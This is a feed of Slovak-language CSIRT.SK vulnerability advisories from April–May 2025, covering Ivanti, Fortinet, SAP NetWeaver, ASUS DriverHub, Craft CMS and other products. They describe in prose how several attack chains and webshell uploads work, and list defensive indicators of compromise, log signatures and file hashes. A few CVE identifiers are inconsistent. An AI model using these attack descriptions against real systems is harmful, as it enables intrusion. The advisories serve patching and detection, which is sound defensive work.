To sa dá zneužiť napríklad na zvýšenie oprávnení v prípade, že kompromitované používateľské konto má práva sudo na spustenie bench run-patch *. Rovnaký prípad môže nastať aj keď existuje vlastná administrátorská stránka na aplikovanie záplat, ktorú možno zneužiť pomocou už spomínaného SSRF.

Mesačná správa CSIRT.SK – apríl 2025

Marian Danko — Thu, 15 May 2025 13:11:57 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci apríl 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 04/2025 PDF (1 523 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Aktívne zneužívané zraniteľnosti v produktoch Ivanti EPMM a Neurons for ITSM

Marian Danko — Wed, 14 May 2025 15:35:54 +0000

Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre kritickú zraniteľnosť produktu Neurons for ITSM a dve aktívne zneužívané zraniteľnosti v Endpoint Manager Mobile (EPMM). Zraniteľnosti s identifikátormi CVE-2025-22462, CVE-2025-4427 a CVE-2025-4427 možno zneužiť na získanie neoprávneného prístupu k citlivým údajom, vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Ivanti Neurons for ITSM 2023.4 bez aplikovanej záplaty May 2025 Security Patch
Ivanti Neurons for ITSM 2024.3 bez aplikovanej záplaty May 2025 Security Patch
Ivanti Neurons for ITSM 2024.2 bez aplikovanej záplaty May 2025 Security Patch
Ivanti Endpoint Manager Mobile 11.12.0.X vo verziách starších ako 11.12.0.5
Ivanti Endpoint Manager Mobile 12.3.0.X vo verziách starších ako 12.3.0.2
Ivanti Endpoint Manager Mobile 12.4.0.X vo verziách starších ako 12.4.0.2
Ivanti Endpoint Manager Mobile 12.5.0.X vo verziách starších ako 12.5.0.1

Opis zraniteľnosti:

Ivanti Neurons for ITSM

CVE-2025-22462 (CVSS skóre 9,8)

Kritická zraniteľnosť spočíva v nedostatočnej implementácii mechanizmov autentifikácie a vzdialený neautentifikovaný útočník by ju mohol zneužiť na získanie administrátorského prístupu do systému.

Ivanti Endpoint Manager Mobile

CVE-2025-4427 (CVSS skóre 5,3)

Zraniteľnosť možno zaslaním špeciálne vytvorených API požiadaviek zneužiť na obídenie mechanizmov autentifikácie a získanie neoprávneného prístupu k citlivým údajom.

CVE-2025-4428 (CVSS skóre 7,2)

CVE-2025-4428 by vzdialený autentifikovaný útočník zaslaním špeciálne vytvorených API požiadaviek mohol zneužiť na vzdialené vykonanie kódu.

Pozn.: Zreťazením zraniteľností EPMM možno získať schopnosť vzdialene vykonávať kód bez autentifikácie. Zraniteľnosti sú v súčasnosti aktívne zneužívané na prienik do systémov.

Možné škody:

Neoprávnený prístup k citlivým údajom
Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom lokálne nasadených inštancií Ivanti Neurons for ITSM odporúčame bezodkladnú inštaláciu bezpečnostných záplat May 2025 Security Patch pre verzie 2023.4, 2024.2 a 2024.3 a dodržiavanie odporúčaného postupu pre zabezpečenie webových stránok IIS a prevádzkovanie produktu v rámci DMZ.

Administrátorom lokálne nasadených inštancií Ivanti EPMM odporúčame bezodkladnú aktualizáciu na verzie 11.12.0.5, 12.3.0.2, 12.4.0.2 alebo 12.5.0.1. Vzhľadom na to, že zneužitie oboch zraniteľností spočíva v zaslaní špeciálne vytvorených API požiadaviek, zraniteľnosti možno mitigovať limitovaním prístupu k API rozhraniu APMM. Výrobca odporúča prístup limitovať prostredníctvom ACL (Access Control List) funkcionality produktu alebo prostredníctvom externého WAF (Web Application Firewall). Kompletný návod môžete nájsť na stránke výrobcu, v časti Mitigation or Workaround.

Zdroje:

Kritická zero-day zraniteľnosť v produktoch Fortinet FortiVoice, FortiMail, FortiNDR, FortiRecorder a FortiCamera

Marian Danko — Wed, 14 May 2025 15:33:50 +0000

Spoločnosť Fortinet vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zero-day zraniteľnosť v produktoch FortiVoice, FortiMail, FortiNDR, FortiRecorder a FortiCamera. CVE-2023-32756 možno zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom. Zraniteľnosť je aktívne zneužívaná v rámci útokov na telefónne systémy FortiVoice.

Zraniteľné systémy:

FortiCamera 2.1 vo verziách starších ako 2.1.4
FortiCamera 2.0 vo všetkých verziách
FortiCamera 1.1 vo všetkých verziách
FortiMail 7.6 vo verziách starších ako 7.6.3
FortiMail 7.4 vo verziách starších ako 7.4.5
FortiMail 7.2 vo verziách starších ako 7.2.8
FortiMail 7.0 vo verziách starších ako 7.0.9
FortiNDR 7.6 vo verziách starších ako 7.6.1
FortiNDR 7.4 vo verziách starších ako 7.4.8
FortiNDR 7.2 vo verziách starších ako 7.2.5
FortiNDR 7.1 vo všetkých verziách
FortiNDR 7.0 vo verziách starších ako 7.0.7
FortiNDR 1.5 vo všetkých verziách
FortiNDR 1.4 vo všetkých verziách
FortiNDR 1.3 vo všetkých verziách
FortiNDR 1.2 vo všetkých verziách
FortiNDR 1.1 vo všetkých verziách
FortiRecorder 7.2 vo verziách starších ako 7.2.4
FortiRecorder 7.0 vo verziách starších ako 7.0.6
FortiRecorder 6.4 vo verziách starších ako 6.4.6
FortiVoice 7.2 vo verziách starších ako 7.2.1
FortiVoice 7.0 vo verziách starších ako 7.0.7
FortiVoice 6.4 vo verziách starších ako 6.4.11

Opis zraniteľnosti:

CVE-2025-32756 (CVSS 3.1 skóre: 9,6)

Kritická zraniteľnosť spočíva v pretečení vyrovnávacej pamäte zásobníka a vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených HTTP požiadaviek mohol zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Pozn.: Zraniteľnosť je aktívne zneužívaná v rámci útokov na telefónne systémy FortiVoice. Útočníci po prieniku do systému vykonávajú skenovanie siete, mažú systémové crashlogy a aktivujú funkciu fcgi debugging za účelom zaznamenávania prihlasovacích údajov zo systému a prihlasovania prostredníctvom SSH.

Možné škody:

Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Výrobca odporúča používať len produkty s platnou technickou podporou. Administrátorom odporúčame bezodkladnú aktualizáciu FortiCamera aspoň na verziu 2.1.4; FortiMail na verzie 7.6.3, 7.4.5, 7.2.8 alebo 7.0.9; FortiNDR na verzie 7.6.1, 7.4.8, 7.2.5 alebo 7.0.7; FortiRecorder na verzie 7.2.4, 7.0.6 alebo 6.4.6 a FortiVoice na verzie 7.2.1, 7.0.7 alebo 6.4.11. V prípade, že aktualizáciu systémov nie je možné vykonať, zraniteľnosť je možné mitigovať limitovaním prístupu k administratívnemu rozhraniu zariadení alebo úplným vypnutím HTTP/HTTPS prístupu k nim.

Taktiež odporúčame vykonať kontrolu logov a nastavení za účelom identifikácie pokusov o zneužitie tejto zraniteľnosti a preverenie IOC v rámci logov sieťových a bezpečnostných prvkov.

V rámci kontroly logov prostredníctvom CLI príkazu „diagnose debug application httpd display trace-log“ indikuje zneužitie zraniteľnosti prítomnosť riadkov v tvare:
- [x x x x:x:x.x 2025] [fcgid:warn] [pid 1829] [client x.x.x.x:x] mod_fcgid: error reading data, FastCGI server closed connection
- [x x x x:x:x.x 2025] [fcgid:error] [pid 1503] mod_fcgid: process /migadmin/www/fcgi/admin.fe(1741) exit(communication error), get unexpected signal 11
Preveriť stav funkcie fcgi debugging prostredníctvom CLI príkazu „diag debug application fcgi“. Ak je funkcia na zariadení aktívna, výpis obsahuje reťazec „general to-file ENABLED“. Nakoľko uvedená funkcia nie je v predvolenom nastavení aktívna, ak ste ju neaktivovali manuálne, indikuje aktivitu útočníka.
Vykonať kontrolu integrity súborového systému zariadenia za účelom identifikácie súborov nahraných útočníkom
- /bin/wpad_ac_helper
  - MD5:4410352e110f82eabc0bf160bec41d21
- /bin/busybox
  - MD5:ebce43017d2cb316ea45e08374de7315
  - MD5: 489821c38f429a21e1ea821f8460e590
- /lib/libfmlogin.so
  - MD5:364929c45703a84347064e2d5de45bcd
- /bin/fmtest
  - MD5: 2c8834a52faee8d87cff7cd09c4fb946
- /var/spool/.sync
- /tmp/.sshdpm
Vykonať kontrolu integrity súborového systému zariadenia za účelom identifikácie modifikácie nastavení:
- /data/etc/crontab
- /var/spool/cron/crontabs/root
- /etc/pam.d/sshd
- /etc/httpd.conf

Indikátory kompromitácie:

43.228.217[.]82
43.228.217[.]173
156.236.76[.]90
198.105.127[.]124
218.187.69[.]244
218.187.69[.]59

Zdroje:

Kritická zraniteľnosť vo vizualizačnej platforme Kibana

Marian Danko — Wed, 14 May 2025 15:31:34 +0000

Spoločnosť Elastic vydala bezpečnostné aktualizácie svojej vizualizačnej platformy Kibana, ktoré opravujú kritickú zraniteľnosť. CVE-2025-25014 by vzdialený autentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Elastic Kibana vo verziách 8.3.0 až 8.17.5
Elastic Kibana vo verzii 8.18.0
Elastic Kibana vo verzii 9.0.0

Pozn.: Zraniteľnosť je možné zneužiť len na inštanciách, na ktorých sú súčasne aktívne funkcie Machine Learning a Reporting.

Opis zraniteľnosti:

CVE-2025-25014 (CVSS 3.1 skóre: 9,1)

Kritická zraniteľnosť spočíva v nedostatočnej kontrole neoprávnenej manipulácie s atribútmi prototypov objektov. Vzdialený autentifikovaný útočník by ju mohol zneužiť na vykonanie ľubovoľného kódu zaslaním špeciálne vytvorených HTTP požiadaviek na koncové body Machine Learning a Reporting.

Možné škody:

Vykonanie ľubovoľného kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame bezodkladnú aktualizáciu Elastic Kibana na verzie 8.17.6, 8.18.1 alebo 9.0.1. V prípade, že aktualizáciu nie je možné vykonať, zraniteľnosť možno dočasne mitigovať aj deaktiváciou minimálne jednej z funkcií Machine Learning alebo Reporting.

Funkciu Machine Learning možno na lokálnych aj cloudových inštanciách deaktivovať pridaním xpack.ml.enabled: false do konfiguračného súboru elasticsearch.yml. Na lokálnych inštanciách je funkciu možno deaktivovať aj pridaním xpack.ml.ad.enabled: false do kibana.yml.

Funkciu Reporting možno na lokálnych aj cloudových inštanciách deaktivovať pridaním xpack.reporting.enabled: false do konfiguračného súboru kibana.yml.

Zdroje:

Kritická zraniteľnosť v bezdrôtových kontroléroch Cisco

Marian Danko — Wed, 14 May 2025 15:29:26 +0000

Spoločnosť Cisco vydala bezpečnostné aktualizácie pre svoje bezdrôtové kontroléry s operačným systémom Cisco IOS XE, ktoré opravujú kritickú zraniteľnosť. CVE-2025-20188 by vzdialený útočník mohol zneužiť na nahratie súborov, vzdialené vykonanie príkazov s oprávneniami používateľa root a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Catalyst 9800-CL Wireless Controllers for Cloud
Catalyst 9800 Embedded Wireless Controller for Catalyst 9300, 9400, and 9500 Series Switches
Catalyst 9800 Series Wireless Controllers
Embedded Wireless Controller na prístupových bodoch Catalyst

Pozn.: Zraniteľnosť možno zneužiť len na bezdrôtových kontroléroch s Cisco IOS XE, na ktorých je aktivovaný komponent Out-of-Band AP Image Download.

Opis zraniteľnosti:

CVE-2025-20188 (CVSS 3.1 skóre: 10,0)

Kritická zraniteľnosť sa nachádza v komponente Out-of-Band Access Point Image Download operačného systému Cisco IOC XE Software for Wireless LAN Controllers a spočíva v existencii zabudovaného tokenu JWT (JSON Web Token). Vzdialený neautentifikovaný útočník by ho zaslaním špeciálne vytvorených HTTPS požiadaviek mohol zneužiť na nahratie súborov, realizáciu tzv. path traversal útokov a vzdialené vykonanie príkazov s oprávneniami používateľa root.

Možné škody:

Neoprávnená zmena v systéme
Vzdialené vykonanie príkazov
Získanie úplnej kontroly nad systémom

Odporúčania:

Zraniteľnosť je možné zneužiť len na bezdrôtových kontroléroch s aktivovaným komponentom Out-of-Band AP Image Download. Či je komponent aktívny možno overiť prostredníctvom konzoly zariadení (#wlc) zadaním príkazu show running-config | include ap upgrade. Ak je komponent aktívny, príkaz vráti výstup v tvare ap upgrade method https.

V prípade, že je uvedený komponent aktívny, administrátorom odporúčame prostredníctvom aplikácie Cisco Software Checker preveriť dostupnosť bezpečnostných aktualizácií a ich bezodkladnú inštaláciu.

Zdroje:

Kritická zraniteľnosť v nástroji pre manažment ovládačov ASUS DriverHub

Marian Danko — Wed, 14 May 2025 15:27:38 +0000

Spoločnosť ASUS vydala bezpečnostné aktualizácie svojho nástroja pre manažment ovládačov ASUS DriverHub, ktoré opravujú dve zraniteľnosti, z čoho jedna je označená ako kritická. Vzdialený neautentifikovaný útočník by zreťazením zraniteľností s identifikátormi CVE-2025-3462 a CVE-2025-3463 mohol vzdialene vykonať škodlivý kód a spôsobiť úplné narušenie dôvernosti, integrity a dostupnosti systému.

Zraniteľné systémy:

ASUS DriverHub vo verziách starších ako 1.0.6.0

Pozn.: Aplikácia slúži na kontrolu dostupnosti nových aktualizácií, je automaticky inštalovaná pri bootovaní zariadení so špecifickými základnými doskami od spoločnosti ASUS a beží na lokálnom porte 53000.

Opis zraniteľnosti:

CVE-2025-3463 (CVSS 3.1 skóre: 9,4), CVE-2025-3462 (CVSS 3.1 skóre: 8,4)

Bezpečnostné zraniteľnosti spočívajú v nedostatočnom overovaní certifikátov a pôvodu. Vzdialený neautentifikovaný útočník by ich zaslaním špeciálne vytvorených HTTP požiadaviek mohol zneužiť na interakciu s internými funkcionalitami softvéru a vykonanie zmien na zraniteľnom systéme.

Zreťazením uvedených zraniteľností možno vzdialene vykonať škodlivý kód a získať úplnú kontrolu nad systémom. Úspešné zneužitie vyžaduje interakciu zo strany obete, ktorá musí navštíviť špeciálne vytvorenú webovú stránku na doméne v tvare driverhub.asus.com.<ĽUBOVOĽNÝ TEXT>.com. DriverHub následne zavolá nástroj AsusSetup.exe s flagom -s pre tichú inštaláciu. V takomto prípade nástroj spustí súbor uvedený v parametri SilentInstallRun v súbore AsusSetup.ini. Útočník môže podvrhnúť súbor AsusSetup.ini, ktorý presmeruje inštalátor na škodlivý súbor, ktorý útočník zadá v danom parametri.

Možné škody:

Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu ASUS DriverHub na verziu 1.0.6.0.

Zdroje:

https://www.asus.com/content/asus-product-security-advisory/ (časť 05/09/2025 Security Update for ASUS DriverHub)
https://mrbruh.com/asusdriverhub/
https://thehackernews.com/2025/05/asus-patches-driverhub-rce-flaws.html?m=1

Zraniteľnosť webového manažmentového nástroja Webmin

Marian Danko — Wed, 14 May 2025 15:24:54 +0000

Vývojári webového ovládacieho panelu pre vzdialený manažment serverov Webmin vydali aktualizáciu svojho produktu, ktorá opravuje vysoko závažnú zraniteľnosť. CVE-2025-2774 by vzdialený autentifikovaný útočník mohol zneužiť na eskaláciu privilégií, vykonanie ľubovoľného kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Webmin vo verziách starších ako 2.302

Opis zraniteľnosti:

CVE-2025-2774 (CVSS 3.1 skóre: 8,8)

Vysoko závažná zraniteľnosť spočíva v nedostatočnej neutralizácii CRLF sekvencií v rámci CGI (Common Gateway Interface) požiadaviek. Vzdialený autentifikovaný útočník by ju zaslaním špeciálne vytvorených CGI požiadaviek mohol zneužiť na eskaláciu privilégií a vykonanie škodlivého kódu v kontexte používateľa root.

Možné škody:

Eskalácia privilégií
Vykonanie ľubovoľného kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu Webmin na verziu 2.302 alebo novšiu. Taktiež odporúčame vykonať kontrolu logov zariadenia a sieťových a bezpečnostných prvkov za účelom preverenia prítomnosti pokusov o zneužitie zraniteľnosti.

Zdroje:

Kritická zraniteľnosť v IP kamerách Ubiquiti UniFi Protect

Marian Danko — Wed, 14 May 2025 15:21:28 +0000

Spoločnosť Ubiquiti vydala bezpečnostné aktualizácie pre svoje IP kamery UniFi Protect, ktoré opravujú kritickú zraniteľnosť. Zraniteľnosť s identifikátorom CVE-2025-23123 možno zneužiť na vykonanie škodlivého kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Ubiquiti UniFi Protect Cameras s firmvérom vo verziách 4.75.43 a starších

Opis zraniteľnosti:

CVE-2025-23123 (CVSS 3.1 skóre: 10,0)

Kritická zraniteľnosť vo firmvéri zariadení UniFi Protect Cameras spočíva v pretečení medzipamäte haldy a vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom, vrátane možnosti sledovania kamerových záznamov, ich manipulácie, či zneužitie získaného prístupu na hlbší prienik.

Pozn.: Zraniteľnosť je možné zneužiť len v prípade, že útočník disponuje prístupom do manažmentovej siete, v ktorej sa zraniteľné zariadenie nachádza.

Možné škody:

Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu firmvéru

Cameras na verziu 4.75.62 alebo novšiu.

Zdroje:

Ďalšia aktívne zneužívaná zraniteľnosť SAP NetWeaver

Marian Danko — Wed, 14 May 2025 15:17:40 +0000

Spoločnosť SAP vydala bezpečnostné aktualizácie pre opravu ďalšej kritickej zraniteľnosti s identifikátorom CVE-2025-42999, ktorá je aktívne zneužívaná v rámci útokov súvisiacich so zneužitím CVE-2025-31324.

Zraniteľné systémy:

SAP NetWeaver bez aplikovanej bezpečnostnej záplaty SAP Security Note 3604119 pre Visual Composer Framework

Pozn.: Zraniteľnosť možno zneužiť len na inštanciách, na ktorých je aktivovaný komponent Visual Composer.

Opis zraniteľnosti:

CVE-2025-42999 (CVSS 3.1 skóre: 9,1)

Aktívne zneužívaná kritická zraniteľnosť sa taktiež nachádza v komponente Visual Composer a súvisí s nezabezpečenou deserializáciou dát. Vzdialený autentifikovaný útočník s vysokými privilégiami by ju nahratím špeciálne vytvorených súborov obsahujúcich škodlivé serializované dáta mohol zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Pozn.: Podľa bezpečnostných výskumníkov zo spoločnosti Onapsis je predmetná zraniteľnosť aktívne zneužívaná minimálne od januára 2025.

Možné škody:

Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú inštaláciu bezpečnostných záplat SAP Security Note 3604119. Zraniteľnosť je možné dočasne mitigovať aj deaktiváciou komponentu Visual Composer, vypnutím aliasu developmentserver a limitovaním prístupu k URL /developmentserver/metadatauploader.

Zdroje:

https://me.sap.com/notes/3604119 (vyžaduje prihlásenie do zákazníckeho portálu SAP)
https://www.bleepingcomputer.com/news/security/sap-patches-second-zero-day-flaw-exploited-in-recent-attacks/

Skype v máji skončil

Marian Danko — Wed, 07 May 2025 12:59:59 +0000

Komunikačná platforma Skype, ktorú prevádzkuje spoločnosť Microsoft v rámci balíka svojich služieb, skončila. Od 5.5.2025 je služba dostupná už len pre používateľov platených licencií Skype for Business.

Ostatní používatelia majú možnosť prejsť na službu Microsoft Teams Free. Po prihlásení sa do aplikácie Microsoft Teams s použitím údajov pre účet Skype budú zmigrované do nového účtu Teams kontaktné údaje a konverzácie používateľa. Pokiaľ nebudete chcieť využívať MS Teams, môžete si svoje dáta zo Skype exportovať. Obe možnosti môžete využiť do januára 2026.

Spoločnosť Microsoft kúpila Skype v roku 2011. Aplikáciu vydali v roku 2003 estónski vývojári Ahti Heinla, Priit Kasesalu a Jaan Tallinn. Počas svojej existencie sa stala symbolom telefónnych hovorov cez internet.

Odkazy:

Mesačný prehľad kritických zraniteľností apríl 2025

Marian Danko — Mon, 05 May 2025 15:52:03 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci apríl 2025.

Mesačný prehľad – 04/2025 PDF (568 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Aktívne zneužívané kritické zraniteľnosti v Craft CMS

Marian Danko — Mon, 05 May 2025 15:49:50 +0000

Vývojári redakčného systému Craft CMS vydali bezpečnostné aktualizácie, ktoré opravujú dve aktívne zneužívané kritické zraniteľnosti. Kritické zraniteľnosti s označením CVE-2025-32432 a CVE-2024-58136 by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Craft CMS 5.X vo verziách starších ako 5.6.17
Craft CMS 4.X vo verziách starších ako 4.14.15
Craft CMS 3.X vo verziách starších ako 3.9.15

Opis zraniteľnosti:

CVE-2025-32432 (CVSS 3.1 skóre: 10,0)

Kritická zraniteľnosť sa nachádza v zabudovanej funkcionalite na transformáciu obrázkov a spočíva v nedostatočnom overovaní používateľských vstupov. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených HTTP POST požiadaviek mohol zneužiť na vzdialené vykonanie kódu. Na úspešné zneužitie zraniteľnosti musí útočník disponovať platným tzv. Asset ID, ktoré slúži na identifikáciu dokumentov a médií v rámci redakčného systému. Platné Asset ID útočník môže získať zaslaním veľkého množstva požiadaviek POST.

CVE-2024-58136 (CVSS 3.1 skóre: 9,0)

Zraniteľnosť v PHP frameworku Yii 2 používanom v rámci Craft CMS súvisí s nesprávnym narábaním s obsahom premennej __class. Možno zneužiť na vzdialené vykonanie kódu.

Pozn.: Zraniteľnosti sú podľa Orange Cyberdefense SensePort aktívne zneužívané minimálne od 14. februára 2025.

Možné škody:

Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu Craft CMS na verzie 5.6.17, 4.14.15, 3.9.15 alebo novšie.

Vývojári okrem aktualizácie odporúčajú preveriť prítomnosť pokusov o zneužitie zraniteľnosti v logoch Craft CMS (CRAFT_INSTALL_PATH/storage/logs/), webového servera, sieťových a bezpečnostných prvkov. V logoch je potrebné vyhľadať HTTP POST požiadavky na actions/assets/generate-transform, ktoré v tela obsahujú textový reťazec __class. Kompletný návod aj s popisom priebehu útoku a indikátormi kompromitácie (IOC) môžete nájsť na stránke vývojárov a Orange Cyberdefense SensePort.

V prípade detekcie pokusov o zneužitie zraniteľnosti je potrebné vykonať kontrolu integrity redakčného systému a databázy, zmenu prihlasovacích údajov (CMS, FTP, databázy, atď.) a kryptografického materiálu (SSH kľúče, certifikáty, atď.).

Zdroje:

Aktívne zneužívaná zraniteľnosť v SAP NetWeaver

Marian Danko — Mon, 05 May 2025 15:47:53 +0000

Spoločnosť SAP vydala bezpečnostné aktualizácie svojho aplikačného servera SAP NetWeaver, ktoré opravujú kritickú zraniteľnosť. CVE-2025-31324 možno zneužiť na nahratie súborov, vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom. Zraniteľnosť je v súčasnosti aktívne zneužívaná útočníkmi na prienik do zraniteľných systémov.

Zraniteľné systémy:

SAP NetWeaver bez aplikovanej bezpečnostnej záplaty SAP Security Note 3594142 pre Visual Composer Framework

Pozn.: Zraniteľnosť možno zneužiť len na inštanciách, na ktorých je aktivovaný komponent Visual Composer

Opis zraniteľnosti:

CVE-2025-31324 (CVSS 3.1 skóre: 10,0)

Kritická zraniteľnosť sa nachádza v komponente Visual Composer a spočíva v nedostatočnej kontrole autorizácie. Zraniteľnosť by vzdialený neautentifikovaný útočník zaslaním špeciálne vytvorených HTTP POST požiadaviek na /developmentserver/metadatauploader mohol zneužiť na nahratie ľubovoľných súborov, vykonanie škodlivého kódu a získanie úplnej kontroly nad systémom.

Pre zraniteľnosť je v súčasnosti dostupný proof-of-concept kód demonštrujúci jej zneužitie a je aktívne zneužívaná útočníkmi. Útočníci zraniteľnosť zneužívajú na nahratie webshellov umožňujúcich vykonávanie príkazov na operačnom systéme SAP servera a sťahovanie a spúšťanie ďalšieho škodlivého obsahu. Výskumníci z ReliaQuest zaznamenali šírenie frameworku BRUTE RATEL slúžiaceho na zabezpečenie perzistentného prístupu k systému a použitie injektov HEAVEN’S GATE na obchádzanie detekčných mechanizmov riešení EDR.

Možné škody:

Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú inštaláciu bezpečnostnej záplaty SAP Security Note 3594142. Zraniteľnosť je možné dočasne mitigovať aj deaktiváciou komponentu Visual Composer, vypnutím aliasu developmentserver a limitovaním prístupu k URL /developmentserver/metadatauploader.

Rovnako odporúčame preveriť prítomnosť pokusov o zneužitie zraniteľnosti, ktoré možno rozdeliť do dvoch fáz. Prvá fáza spočíva v kontrole logov SAP NetWeaver, webového servera, sieťových a bezpečnostných prvkov. Zamerajte sa na hľadanie HTTP POST požiadaviek na /developmentserver/metadatauploader. Druhá fáza spočíva v kontrole obsahu priečinka /j2ee/cluster/apps/sapcom/irj/servlet_jsp/irj/root/ na serveri SAP NetWeaver, do ktorého sú nahrávané súbory pri zneužití zraniteľnosti. Kompletný návod na preverenie prítomnosti pokusov o zneužitie zraniteľnosti môžete nájsť na stránkach bezpečnostných výskumníkov z ReliaQuest a RedRays.

V prípade pozitívnych nálezov je potrebné systém považovať za kompromitovaný, izolovať ho a započať relevantné procesy pre riešenie incidentu.

Zdroje:

https://me.sap.com/notes/3594142 (vyžaduje prihlásenie do zákazníckeho portálu SAP)
https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/
https://redrays.io/blog/critical-sap-netweaver-vulnerability-cve-2025-31324-fixed-actively-exploited-in-the-wild/

Kritická zraniteľnosť v knižnici Erlang/OTP

Marian Danko — Fri, 25 Apr 2025 14:22:45 +0000

Vývojári knižnice Erlang OTP (Open Telecom Platform) vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť v serverovom komponente SSH. Zraniteľnosť s identifikátorom CVE-2025-32433 možno zneužiť na vzdialené vykonanie kódu.

Zraniteľné systémy:

Knižnica Erlang/OTP vo verziách starších ako 27.3.3
Knižnica Erlang/OTP vo verziách starších ako 26.2.5.11
Knižnica Erlang/OTP vo verziách starších ako 25.3.2.20

Opis zraniteľnosti:

CVE-2025-32433 (CVSS 3.1 skóre: 10,0)

Kritická zraniteľnosť spočíva v nesprávnom spracovaní správ protokolu SSH, ktoré umožňuje zaslanie správ protokolu pripojenia ešte pred samotnou autentifikáciou používateľa. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie kódu v kontexte SSH démona a získanie úplnej kontroly nad Erlang/OTP SSH serverom.

Na uvedenú zraniteľnosť je v súčasnosti dostupný aj Proof-of-Concept kód demonštrujúci spôsob jej zneužitia.

Možné škody:

Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Odporúčame uistiť sa, či Vaše aplikácie a služby nevyužívajú SSH servery založené na zraniteľných verziách knižnice. V prípade, že áno, odporúčame vykonať bezodkladnú aktualizáciu knižnice Erlang/OTP na verzie 27.3.3, 26.2.5.11 alebo 25.3.2.20.

V prípade, že aktualizáciu systémov nie je možné vykonať, zraniteľnosť je možné mitigovať aj limitovaním sieťovej komunikácie len na dôveryhodné zdroje.

Uvedená knižnica je súčasťou produktov viacerých výrobcov, vrátane systémov ICS (Industrial Control Systems) a OT (Operational Technology). Výrobcovia pracujú na zapracovaní aktualizácií do svojich produktov. Čiastočný zoznam produktov využívajúcich túto knižnicu možno nájsť na stránke bezpečnostných výskumníkov zo spoločnosti Arctic Wolf, v časti Potentionally Affected Third-Party Software.

Zdroje:

Kritická zraniteľnosť vo frameworku PyTorch

Marian Danko — Fri, 25 Apr 2025 14:19:43 +0000

Vývojári pythonového open-source frameworku pre strojové učenie PyTorch vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť. CVE-2025-32434 možno zneužiť na vzdialené vykonanie kódu.

Zraniteľné systémy:

PyTorch vo verziách 2.5.1 a starších

Opis zraniteľnosti:

CVE-2025-32434 (CVSS 4.0 skóre: 9,3)

Kritická zraniteľnosť sa nachádza vo funkcii torch.load(), ktorá je používaná na načítavanie modelov a spočíva v deserializácii nedôveryhodných údajov. Vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvoreného modelu mohol zneužiť na vzdialené vykonanie kódu.

Pozn.: Zraniteľnosť je možné zneužiť aj v prípade volania funkcie s parametrom weights_only=True, ktorý bol doteraz považovaný za bezpečný.

Možné škody:

Vzdialené vykonanie kódu

Odporúčania:

Odporúčame uistiť sa, či Vaše aplikácie a služby nevyužívajú zraniteľné verzie knižnice PyTorch. V prípade, že áno, odporúčame vykonať bezodkladnú aktualizáciu knižnice na verziu 2.6.0.

Zdroje:

Kritická zraniteľnosť v SonicWall SonicOS SSLVPN

Marian Danko — Fri, 25 Apr 2025 14:17:34 +0000

Spoločnosť SonicWall vydala bezpečnostné aktualizácie svojho operačného systému SonicOS, ktoré opravujú vysoko závažnú zraniteľnosť v rozhraní SSLVPN Virtual Office. CVE-2025-32818 by vzdialený neautentifikovaný útočník mohol zneužiť na zneprístupnenie služby.

Zraniteľné systémy:

Zariadenia série Gen7 NSv (NSv 270, NSv 470, NSv 870) so SonicOS vo verzii firmvéru 7.1.1-7040 až 7.1.3-7015
Zariadenia série Gen7 Firewalls (TZ270, TZ270W, TZ370, TZ370W, TZ470, TZ470W, TZ570, TZ570W, TZ570P, TZ670, NSa 2700, NSa 3700,NSa 4700, NSa 5700, NSa 6700, NSsp 10700, NSsp 11700, NSsp 13700, NSsp 15700) so SonicOS vo verzii firmvéru firmvéru 7.1.1-7040 až 7.1.3-7015
